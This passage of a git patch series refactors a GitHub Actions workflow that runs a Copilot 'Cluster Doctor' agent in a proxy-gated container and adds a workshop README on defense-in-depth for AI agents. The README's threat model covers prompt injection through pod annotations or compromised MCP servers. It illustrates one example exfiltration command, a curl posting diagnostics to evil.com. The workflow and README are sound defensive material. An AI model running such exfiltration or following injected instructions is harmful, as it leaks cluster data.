"$REPO_ROOT/.github/containers/proxy/squid.conf:/etc/squid/squid.conf:ro" \ - -v "$DOMAINS_FILE:/etc/squid/allowed-domains.txt:ro" \ - ubuntu/squid:latest - -# Proxy needs bridge access to reach the internet on behalf of the agent -docker network connect bridge "$PROXY_CONTAINER" - -sleep 3 -echo "Proxy ready" - -# ── Run agent in isolated container ── -echo "Starting agent container (network-isolated, proxy-gated)..." -docker run --rm \ - --name "$AGENT_CONTAINER" \ - --network "$NETWORK_NAME" \ - -e "HTTP_PROXY=http://$PROXY_CONTAINER:3128" \ - -e "HTTPS_PROXY=http://$PROXY_CONTAINER:3128" \ - -e "NO_PROXY=localhost,127.0.0.1" \ - -e "GITHUB_TOKEN=$COPILOT_TOKEN" \ - -e "GITHUB_MCP_TOKEN=$GITHUB_MCP_TOKEN" \ - -e "KUBECONFIG=/home/agent/.kube/config" \ - -v "$KUBECONFIG_PATH:/home/agent/.kube/config:ro" \ - -v "$REPO_ROOT:/workspace:ro" \ - -v "$(dirname "$OUTPUT_FILE"):/output:rw" \ - -v "$PROMPT_FILE:/tmp/prompt.md:ro" \ - -w /workspace \ - cluster-doctor-agent:local \ - -c ' - kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & - sleep 3 - - copilot -p "$(cat /tmp/prompt.md)" \ - --agent "cluster-doctor" \ - --additional-mcp-config @"'"$MCP_CONFIG"'" \ - --allow-all-tools - - if [ -f agent-output.json ]; then - cp agent-output.json /output/'"$(basename "$OUTPUT_FILE")"' - fi - ' - -echo "Agent container exited" - -# Verify output -if [ -f "$OUTPUT_FILE" ]; then - echo "Agent output produced: $OUTPUT_FILE" - python3 -c "import json; json.load(open('$OUTPUT_FILE'))" || { - echo "ERROR: agent-output.json is not valid JSON" - exit 1 - } -else - echo "ERROR: Agent did not produce output" - exit 1 -fi - -# Full audit trail -echo "" -echo "=== Proxy access log (all agent network activity) ===" -docker logs "$PROXY_CONTAINER" 2>&1 | grep -v "cache.log" || true diff --git a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml index 48c24a2..588c23f 100644 --- a/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml +++ b/.github/workflows/copilot.trigger-cluster-doctor.safe-outputs.yml @@ -1,18 +1,19 @@ name: "Cluster Doctor (Safe Outputs)" -# Three-phase pattern with network-isolated agent: -# 1. Diagnose - Agent in container, all traffic through allowlisted proxy -# 2. Scan - Validate constraints, sanitize secrets, AI threat detection -# 3. Apply - Deterministic write to GitHub (issues, PRs) +# Full defense-in-depth pipeline using two composable actions: +# - agent-sandbox-action: container isolation + network firewall +# - safe-outputs-action: constraint validation + secret sanitization + gated writes # -# Defense-in-depth layers: -# - Container isolation (agent runs in Docker, not on bare runner) -# - Network firewall (Squid proxy with domain allowlist) -# - Scoped credentials (read-only K8s RBAC, read-only Azure) -# - Safe outputs (constraint validation, secret sanitization, threat detection) -# - Permission separation (three jobs, three permission sets) +# Three jobs, three permission sets, five security layers: +# 1. Container isolation (agent in Docker) +# 2. Network firewall (Squid proxy, domain allowlist) +# 3. Scoped credentials (read-only K8s + Azure) +# 4. Output validation (constraints, sanitization, threat detection) +# 5. Permission separation (diagnose / scan / apply) # -# See: https://github.com/microsoftgbb/safe-outputs-action +# See: +# https://github.com/microsoftgbb/agent-sandbox-action +# https://github.com/microsoftgbb/safe-outputs-action on: workflow_dispatch: @@ -24,14 +25,9 @@ on: permissions: contents: read -# ────────────────────────────────────────────────────────── -# Network firewall: domain allowlist for the agent container. -# The agent can ONLY reach these domains. Everything else is -# blocked by the Squid proxy at the network level. -# -# Edit this list to add/remove allowed destinations. -# The cluster API server FQDN is added dynamically at runtime. -# ────────────────────────────────────────────────────────── +# Domain allowlist for the agent sandbox. +# Edit this list to control which domains the agent can reach. +# The cluster API server FQDN is appended dynamically at runtime. env: AGENT_ALLOWED_DOMAINS: | api.githubcopilot.com @@ -44,21 +40,14 @@ jobs: # ────────────────────────────────────────────────────────── # Job 1: Diagnose # - # Setup runs on the bare runner (Azure login, kubeconfig). - # Agent runs inside an isolated Docker container where all - # network traffic is routed through a Squid proxy enforcing - # a domain allowlist. The proxy log provides a full audit - # trail of every domain the agent contacted. - # - # Allowed domains: - # - api.githubcopilot.com (model API) - # - api.github.com (GitHub MCP, read-only) - # - *.azmk8s.io (K8s API server, for port-forward) - # - login.microsoftonline.com (Azure AD token exchange) - # - management.azure.com (Azure ARM, read-only) - # - (injected dynamically) + # Agent runs inside a network-isolated Docker container. + # All traffic routes through a Squid proxy enforcing the + # domain allowlist above. Proxy access log provides a full + # audit trail. # - # Everything else is blocked at the network level. + # The agent can freely explore the cluster via read-only + # MCP access but cannot reach unauthorized domains or + # write to GitHub. # ────────────────────────────────────────────────────────── diagnose: if: | @@ -93,7 +82,6 @@ jobs: run: | curl -fsSL https://gh.io/copilot-install | bash - # ── Parse cluster info (runs on host, needs Copilot CLI) ── - name: Parse cluster info from issue body id: cluster-info env: @@ -121,7 +109,6 @@ jobs: echo "RESOURCE_GROUP=$RESOURCE_GROUP" >> $GITHUB_OUTPUT echo "CLUSTER_NAME=$CLUSTER_NAME" >> $GITHUB_OUTPUT - # ── Setup cluster access (runs on host) ── - name: Azure CLI Login uses: azure/login@v2 with: @@ -129,7 +116,7 @@ jobs: tenant-id: ${{ secrets.ARM_TENANT_ID }} subscription-id: ${{ secrets.ARM_SUBSCRIPTION_ID }} - - name: Get AKS credentials and API server FQDN + - name: Get AKS credentials id: aks run: | az aks install-cli @@ -138,10 +125,8 @@ jobs: --name ${{ steps.cluster-info.outputs.CLUSTER_NAME }} \ --overwrite-existing - # Extract the API server FQDN for the proxy allowlist API_SERVER=$(kubectl config view --minify -o jsonpath='{.clusters[0].cluster.server}' | sed 's|https://||' | cut -d: -f1) echo "api_server=$API_SERVER" >> $GITHUB_OUTPUT - echo "Cluster API server: $API_SERVER" - name: Post work started comment env: @@ -150,77 +135,60 @@ jobs: gh issue comment ${{ steps.get-issue.outputs.issue_number }} \ --body "🤖 **Cluster Doctor is on the case!** - Connected to cluster. AI diagnosis starting in a sandboxed environment - with network-restricted access. + Connected to cluster. AI diagnosis starting in a network-isolated sandbox. 🔗 [View workflow run](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }})" - # ── Generate agent prompt ── - - name: Generate diagnosis prompt - run: | - ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" - CLUSTER_NAME="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" - RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" - - cat > /tmp/diagnosis-prompt.md << PROMPT - You are the Cluster Doctor diagnosing AKS cluster "${CLUSTER_NAME}" in resource group "${RG}". - - Use the AKS MCP server to explore the cluster. You have read-only access to Kubernetes resources. - Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }} for context. - - INVESTIGATE FREELY: - - Start broad (cluster health, node status, pod states) - - Follow threads when you find issues (OOMKilled -> resource limits -> HPA -> node capacity) - - Check pod logs for crash details - - Trace dependency chains (service -> deployment -> pods -> events) - - Look at recent events for warning patterns - - Produce your findings as a JSON file at agent-output.json: - - { - "version": "1", - "actions": [ - { - "type": "issue_comment", - "issue_number": ${ISSUE_NUMBER}, - "body": "## Cluster Doctor Report\n\n" - } - ] - } - - For config/code fixes, add a create_pull_request action: - { - "type": "create_pull_request", - "title": "[cluster-doctor] ", - "body": "", - "head": "cluster-doctor/fix-", - "files": { "path/to/file": "content" } - } - - RULES: - - Write ONLY agent-output.json - - Do NOT include secrets, tokens, connection strings, or internal IPs - - Use [cluster-doctor] prefix on all titles - PROMPT - - # ── Run agent in sandboxed container ── - - name: Run sandboxed agent - env: - COPILOT_CLI_TOKEN: ${{ secrets.COPILOT_CLI_TOKEN }} - GITHUB_MCP_TOKEN: ${{ secrets.GITHUB_TOKEN }} - run: | - # Append the cluster-specific API server FQDN to the allowlist - DOMAINS="${AGENT_ALLOWED_DOMAINS} - ${{ steps.aks.outputs.api_server }}" - - .github/scripts/run-sandboxed-agent.sh \ - --kubeconfig "$HOME/.kube/config" \ - --allowed-domains "$DOMAINS" \ - --prompt-file /tmp/diagnosis-prompt.md \ - --output-file "$GITHUB_WORKSPACE/agent-output.json" \ - --mcp-config ".copilot/mcp-config.json" \ - --copilot-token "$COPILOT_CLI_TOKEN" \ - --github-mcp-token "$GITHUB_MCP_TOKEN" + # ── Sandboxed agent ── + - name: Run agent in sandbox + uses: microsoftgbb/agent-sandbox-action@v1 + with: + allowed-domains: | + ${{ env.AGENT_ALLOWED_DOMAINS }} + ${{ steps.aks.outputs.api_server }} + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN=${{ secrets.GITHUB_TOKEN }} + KUBECONFIG=/home/agent/.kube/config + extra-mounts: | + ${{ env.HOME }}/.kube/config:/home/agent/.kube/config:ro + command: | + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + + ISSUE_NUMBER="${{ steps.get-issue.outputs.issue_number }}" + CLUSTER="${{ steps.cluster-info.outputs.CLUSTER_NAME }}" + RG="${{ steps.cluster-info.outputs.RESOURCE_GROUP }}" + + copilot -p "You are the Cluster Doctor diagnosing AKS cluster '${CLUSTER}' in resource group '${RG}'. + + Use the AKS MCP server to explore the cluster (read-only). + Use the GitHub MCP server to read issue #${ISSUE_NUMBER} in ${{ github.repository }}. + + INVESTIGATE FREELY: + - Start broad (cluster health, node status, pod states) + - Follow threads (OOMKilled -> resource limits -> HPA -> node capacity) + - Check pod logs for crash details + - Trace dependency chains (service -> deployment -> pods -> events) + + Produce findings as agent-output.json: + { + \"version\": \"1\", + \"actions\": [ + { + \"type\": \"issue_comment\", + \"issue_number\": ${ISSUE_NUMBER}, + \"body\": \"## Cluster Doctor Report\n\n\" + } + ] + } + + For config fixes, add a create_pull_request action with files map. + Use [cluster-doctor] prefix on all titles. + Do NOT include secrets, tokens, or internal IPs." \ + --agent "cluster-doctor" \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools - uses: actions/upload-artifact@v4 with: @@ -232,8 +200,8 @@ jobs: # Job 2: Scan # # No credentials. No cluster access. No write tokens. - # Pure validation: constraints, secret sanitization, AI threat scan. - # Acts as a circuit breaker between diagnosis and action. + # Validates constraints, sanitizes secrets, runs AI threat + # detection. Circuit breaker between diagnosis and action. # ────────────────────────────────────────────────────────── scan: needs: diagnose From a51eef924fe93cd1441d56a03964eac90eed4fa1 Mon Sep 17 00:00:00 2001 From: Ray Kao Date: Tue, 14 Apr 2026 21:26:08 -0400 Subject: [PATCH 7/7] docs: add Act 4 - defense-in-depth for agentic workflows New workshop act covering security patterns for AI agents: - Container isolation + network firewall (agent-sandbox-action) - Constraint validation + secret sanitization (safe-outputs-action) - Three-job pipeline (diagnose / scan / apply) - Domain allowlist configuration - Comparison with gh-aw's security model - K8s RBAC recommendations - Workshop activity and discussion questions Also updated root README with workshop Acts table. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- Act-4/README.md | 426 ++++++++++++++++++++++++++++++++++++++++++++++++ README.md | 9 + 2 files changed, 435 insertions(+) create mode 100644 Act-4/README.md diff --git a/Act-4/README.md b/Act-4/README.md new file mode 100644 index 0000000..27aed8a --- /dev/null +++ b/Act-4/README.md @@ -0,0 +1,426 @@ +# Act 4: Agents Shouldn't Have the Keys to the Kingdom + +> **Workshop Goal:** Add defense-in-depth security to your agentic workflows using container isolation, network firewalls, and gated output pipelines - the same patterns GitHub Next uses in Agentic Workflows (gh-aw). + +--- + +## The Scene: The Agent That Knew Too Much + +Your Cluster Doctor agent from Act 3 is working great. It diagnoses failures, posts findings to issues, and opens PRs with fixes. The team loves it. + +Then someone asks: **"What stops the agent from doing something we didn't ask for?"** + +Look at the original workflow: + +```yaml +permissions: + id-token: write + contents: write + issues: write + pull-requests: write +``` + +The agent has: +- **Write access to your repo** (it could push code to main) +- **Write access to issues and PRs** (it could spam your issue tracker) +- **Azure OIDC credentials** (it could talk to your cloud resources) +- **Full network access** (it could send data anywhere on the internet) +- **Direct runner access** (it could read environment variables, other secrets) + +You trust the agent's *intent* - but what about prompt injection? A malicious pod annotation, a crafted event message, or a compromised MCP server could manipulate the agent into doing things you never intended. + +**The question isn't "will the agent misbehave?" It's "what happens when it does?"** + +--- + +## The Insight: Separate Thinking from Acting + +[GitHub Next Agentic Workflows (gh-aw)](https://github.github.com/gh-aw/) solves this with a principle: **the agent can think freely, but its ability to act is constrained by architecture, not trust.** + +Their security model has five layers: + +| Layer | What it does | +|-------|-------------| +| Container isolation | Agent runs in a Docker container, not on the bare runner | +| Network firewall | Squid proxy enforces a domain allowlist - agent can only reach approved destinations | +| Scoped credentials | Agent gets a read-only token - it can observe but not modify | +| Safe outputs | Agent proposes actions as structured data; a separate job validates, sanitizes, and applies them | +| Permission separation | Agent job and write job have different permission sets | + +The problem: gh-aw is repo-scoped. It works great for code analysis, documentation, and issue triage. But it can't reach your Kubernetes cluster, your Azure resources, or your internal APIs. The sandbox blocks external access by design. + +**The pattern we'll build:** Apply gh-aw's security principles to workflows that need external access, using two composable GitHub Actions. + +--- + +## Architecture: Three Jobs, Five Layers + +``` +Job 1: Diagnose Job 2: Scan Job 3: Apply +(read-only creds) (zero creds) (write token only) + ++---------------------------+ +| Docker (--internal net) | +| | +| +-------+ +---------+ | +| | Agent |->| Squid |--+--> allowed Constraint Download +| | | | proxy | | domains only validation scanned output +| +-------+ +---------+ | ++---------------------------+ Secret Apply via + | sanitization GitHub API + v artifact + AI threat + detection + + dry-run (no + writes here) +``` + +**Job 1 - Diagnose:** The agent runs inside a network-isolated container. It has read-only access to the cluster and can follow diagnostic threads freely. All HTTP/HTTPS traffic routes through a Squid proxy that enforces a domain allowlist defined in the workflow YAML. The agent produces a structured JSON artifact describing the actions it wants to take. + +**Job 2 - Scan:** No credentials of any kind. Downloads the agent's artifact and runs it through constraint validation (max issues, title prefixes, label allowlists), secret sanitization (regex patterns for tokens, connection strings, keys), and AI-powered threat detection (prompt injection, malicious code, social engineering). If anything fails, the workflow stops. Nothing gets written. + +**Job 3 - Apply:** Has a GitHub write token but no agent, no cluster credentials, and no AI reasoning. Mechanically applies the validated, sanitized output from Job 2. + +--- + +## The Two Actions + +This pattern is implemented as two composable GitHub Actions: + +### [agent-sandbox-action](https://github.com/microsoftgbb/agent-sandbox-action) - Input containment + +Wraps your agent in a network-isolated Docker container: + +```yaml +- uses: microsoftgbb/agent-sandbox-action@v1 + with: + command: | + copilot -p "Diagnose the cluster..." --agent cluster-doctor + allowed-domains: | + api.githubcopilot.com + api.github.com + .azmk8s.io + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} +``` + +What it does: +- Creates a Docker network with `--internal` (no direct internet) +- Starts a Squid proxy on that network, connected to bridge for outbound +- Runs the agent container with `HTTP_PROXY`/`HTTPS_PROXY` pointed at the proxy +- Only domains in `allowed-domains` can be reached +- Proxy access log provides a full audit trail of every domain the agent contacted + +### [safe-outputs-action](https://github.com/microsoftgbb/safe-outputs-action) - Output gate + +Validates, sanitizes, and applies the agent's proposed actions: + +```yaml +- uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" + threat-detection: true +``` + +What it does: +- **Constraint validation** - enforces limits on how many issues, comments, and PRs the agent can create; requires title prefixes; restricts labels +- **Secret sanitization** - scans all output fields for JWTs, Azure connection strings, AWS keys, GitHub PATs, private keys, and custom patterns +- **AI threat detection** - optional Copilot CLI scan for prompt injection, encoded credentials, malicious code, and social engineering +- **File-based PR creation** - agent provides a `files` map; the action creates branches and commits via the Git Data API + +--- + +## Agent Output Schema + +The agent produces a JSON file describing the actions it wants to take. The safe-outputs action validates and applies them: + +```json +{ + "version": "1", + "actions": [ + { + "type": "issue_comment", + "issue_number": 42, + "body": "## Cluster Doctor Report\n\nFindings here..." + }, + { + "type": "create_pull_request", + "title": "[cluster-doctor] Fix HPA max replicas", + "body": "Analysis found HPA ceiling too low for current load.", + "head": "cluster-doctor/fix-hpa", + "files": { + "k8s/hpa.yaml": "apiVersion: autoscaling/v2\nkind: HorizontalPodAutoscaler\nmetadata:\n name: my-app\nspec:\n maxReplicas: 10" + } + } + ] +} +``` + +Supported action types: + +| Type | Description | +|------|-------------| +| `issue_comment` | Add a comment to an existing issue or PR | +| `create_issue` | Create a new issue | +| `create_pull_request` | Create a PR, optionally with inline file contents | +| `add_labels` | Add labels to an existing issue or PR | + +--- + +## Full Example: Secured Cluster Doctor + +Here is the cluster-doctor workflow from Act 3, refactored with all five security layers: + +```yaml +name: "Cluster Doctor (Safe Outputs)" + +on: + workflow_dispatch: + repository_dispatch: + types: [cluster-doctor-trigger] + issues: + types: [labeled, opened] + +permissions: + contents: read + +# Domain allowlist - the ONLY domains the agent can reach +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com + api.github.com + .azmk8s.io + login.microsoftonline.com + management.azure.com + +jobs: + # ── Job 1: Diagnose (read-only creds, sandboxed agent) ── + diagnose: + if: | + github.event_name == 'workflow_dispatch' || + github.event.label.name == 'cluster-doctor' + environment: copilot + runs-on: ubuntu-latest + permissions: + id-token: write # Azure OIDC (scoped to read-only role) + contents: read + issues: read + + steps: + - uses: actions/checkout@v5 + + # ... (parse cluster info, Azure login, get AKS credentials) ... + + - name: Run agent in sandbox + uses: microsoftgbb/agent-sandbox-action@v1 + with: + allowed-domains: | + ${{ env.AGENT_ALLOWED_DOMAINS }} + ${{ steps.aks.outputs.api_server }} + env-vars: | + GITHUB_TOKEN=${{ secrets.COPILOT_CLI_TOKEN }} + GITHUB_MCP_TOKEN=${{ secrets.GITHUB_TOKEN }} + KUBECONFIG=/home/agent/.kube/config + extra-mounts: | + ${{ env.HOME }}/.kube/config:/home/agent/.kube/config:ro + command: | + kubectl port-forward -n aks-mcp svc/aks-mcp 8000:8000 & + sleep 3 + copilot -p "Diagnose the cluster..." \ + --agent cluster-doctor \ + --additional-mcp-config @'.copilot/mcp-config.json' \ + --allow-all-tools + + - uses: actions/upload-artifact@v4 + with: + name: agent-output + path: agent-output.json + + # ── Job 2: Scan (zero creds, circuit breaker) ── + scan: + needs: diagnose + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/download-artifact@v4 + with: + name: agent-output + + - uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" + threat-detection: true + dry-run: true + custom-secret-patterns: | + 10\.0\.\d+\.\d+ + aks-[a-z0-9]{8,} + + - uses: actions/upload-artifact@v4 + with: + name: scanned-output + path: agent-output.json + overwrite: true + + # ── Job 3: Apply (write token only, no agent) ── + apply: + needs: [diagnose, scan] + runs-on: ubuntu-latest + permissions: + issues: write + contents: write + pull-requests: write + steps: + - uses: actions/download-artifact@v4 + with: + name: scanned-output + + - uses: microsoftgbb/safe-outputs-action@v1 + with: + artifact-path: agent-output.json + max-comments: 2 + max-pull-requests: 1 + title-prefix: "[cluster-doctor] " + allowed-labels: "cluster-doctor,bug,investigation" +``` + +--- + +## What Changed from Act 3 + +| Dimension | Act 3 (original) | Act 4 (secured) | +|-----------|------------------|-----------------| +| Agent environment | Bare runner, full access | Docker container, isolated network | +| Network access | Unrestricted internet | Squid proxy, domain allowlist | +| GitHub permissions | `contents: write`, `issues: write`, `pull-requests: write` in agent job | `contents: read`, `issues: read` in agent job; writes in separate job | +| How agent writes | Direct MCP calls to GitHub API | Produces JSON artifact, validated and applied by separate job | +| Secret exposure | Agent has all env vars including tokens | Agent has only scoped read-only credentials | +| Audit trail | GitHub Actions logs only | Proxy access log of every domain the agent contacted | +| Threat detection | None | AI-powered scan + regex sanitization | +| Output constraints | None - agent can create unlimited issues/PRs | Configurable limits, title prefixes, label allowlists | + +--- + +## The Domain Allowlist: Your Network Firewall + +The allowlist is defined in plain YAML at the top of the workflow: + +```yaml +env: + AGENT_ALLOWED_DOMAINS: | + api.githubcopilot.com # Copilot model API + api.github.com # GitHub MCP (read-only) + .azmk8s.io # AKS cluster API servers + login.microsoftonline.com # Azure AD token exchange + management.azure.com # Azure ARM (read-only) +``` + +The `.` prefix matches all subdomains (Squid dstdomain syntax). The cluster API server FQDN is appended dynamically at runtime. + +If the agent (or a prompt injection attack) tries to reach any other domain: + +``` +curl https://evil.com/exfil -d @diagnostics.json +# Connection refused - domain not in allowlist +``` + +The proxy access log records every request, providing a full audit trail: + +``` +1713139200.123 200 CONNECT api.githubcopilot.com:443 +1713139201.456 200 CONNECT api.github.com:443 +1713139202.789 403 CONNECT evil.com:443 # BLOCKED +``` + +--- + +## Recommended K8s RBAC + +The AKS MCP server should use a read-only ClusterRole: + +```yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: cluster-doctor-readonly +rules: + - apiGroups: [""] + resources: [pods, events, nodes, services, namespaces] + verbs: [get, list] + - apiGroups: [""] + resources: [pods/log] + verbs: [get] + - apiGroups: [apps] + resources: [deployments, replicasets, daemonsets, statefulsets] + verbs: [get, list] + - apiGroups: [autoscaling] + resources: [horizontalpodautoscalers] + verbs: [get, list] + # NO secrets, NO configmaps, NO write verbs +``` + +The agent can freely explore within these boundaries - checking pod logs when it sees crashes, inspecting HPA config when it sees scaling issues, tracing dependency chains across resources - but it cannot read secrets or mutate anything. + +--- + +## How This Compares to gh-aw + +| Layer | gh-aw | This pattern | +|-------|-------|-------------| +| Container isolation | Built-in | `agent-sandbox-action` | +| Network firewall | AWF (Squid + iptables) | Squid + `--internal` Docker network | +| Domain config | Workflow markdown | Workflow YAML `env` block | +| Scoped credentials | Read-only GitHub token | Read-only K8s + Azure + GitHub | +| Safe outputs | Built-in (tightly coupled to runtime) | `safe-outputs-action` (standalone) | +| Threat detection | Built-in AI scan | Copilot CLI scan | +| Scope | Repo only (no external systems) | Any system the agent can reach | + +The key difference: gh-aw's sandbox works because it only needs to reach GitHub APIs. When your agent needs to talk to Kubernetes clusters, Azure resources, or other external systems, you need the same security patterns with a wider aperture for input sources. That is what these two actions provide. + +--- + +## Workshop Activity (30 minutes) + +### Part 1: Secure the Cluster Doctor (15 min) + +1. Look at the original cluster-doctor workflow from Act 3 +2. Identify which permissions the agent has that it doesn't need +3. Add `agent-sandbox-action` to the workflow with an appropriate domain allowlist +4. Add `safe-outputs-action` with constraints that match your team's policies + +### Part 2: Test the Guardrails (15 min) + +1. Run the secured workflow with `dry-run: true` on safe-outputs +2. Review the proxy access log - what domains did the agent contact? +3. Modify the agent prompt to ask for output that violates a constraint (e.g., missing title prefix) +4. Verify the scan job blocks it + +### Discussion Questions + +- What domains does your agent actually need? Start with zero and add as needed. +- What's the right max-comments / max-pull-requests for your team's workflows? +- Should `fail-on-sanitize` be true (strict) or false (redact and proceed)? +- How would you add a human approval step between scan and apply? + +--- + +## Key Takeaways + +1. **Trust the architecture, not the agent.** A well-scoped agent with guardrails is safer than a "smart" agent with full access. The agent will eventually be confused or manipulated - what matters is the blast radius. + +2. **Separate thinking from acting.** The agent can reason freely with read-only access. Its proposed actions go through validation, sanitization, and threat detection before anything is written. + +3. **The domain allowlist is your network firewall.** Start with the minimum domains your agent needs. Every additional domain increases the exfiltration surface. + +4. **Output constraints catch what prompts can't prevent.** No matter how good your system prompt is, the agent might produce unexpected output. Hard limits on issues, required title prefixes, and label allowlists provide a deterministic safety net. + +5. **Audit trails matter.** The proxy access log and the safe-outputs summary give you visibility into exactly what the agent did and what it tried to do. diff --git a/README.md b/README.md index 5a4d7d9..1652f23 100644 --- a/README.md +++ b/README.md @@ -109,6 +109,15 @@ This repository is organized to support different presentation needs and learnin - **Presentations** - Slide decks tailored for different audiences (executives, practitioners, developers) - **Demos** - Hands-on examples demonstrating agentic platform engineering in action +### Workshop Acts (Crawl, Walk, Run) + +| Act | Title | Focus | +|-----|-------|-------| +| [Act 1](./Act-1/) | The Platform Is Growing Faster Than the Team | Knowledge capture with AI agent personas and prompts | +| [Act 2](./Act-2/) | Standards Exist, but They're Not Enforced | Embedding agents into CI/CD workflows | +| [Act 3](./Act-3/) | Kubernetes Operations Don't Scale Linearly | Event-driven agent workflows for incident response | +| [Act 4](./Act-4/) | Agents Shouldn't Have the Keys to the Kingdom | Defense-in-depth security for agentic workflows | + ## Getting Started _(Coming soon)_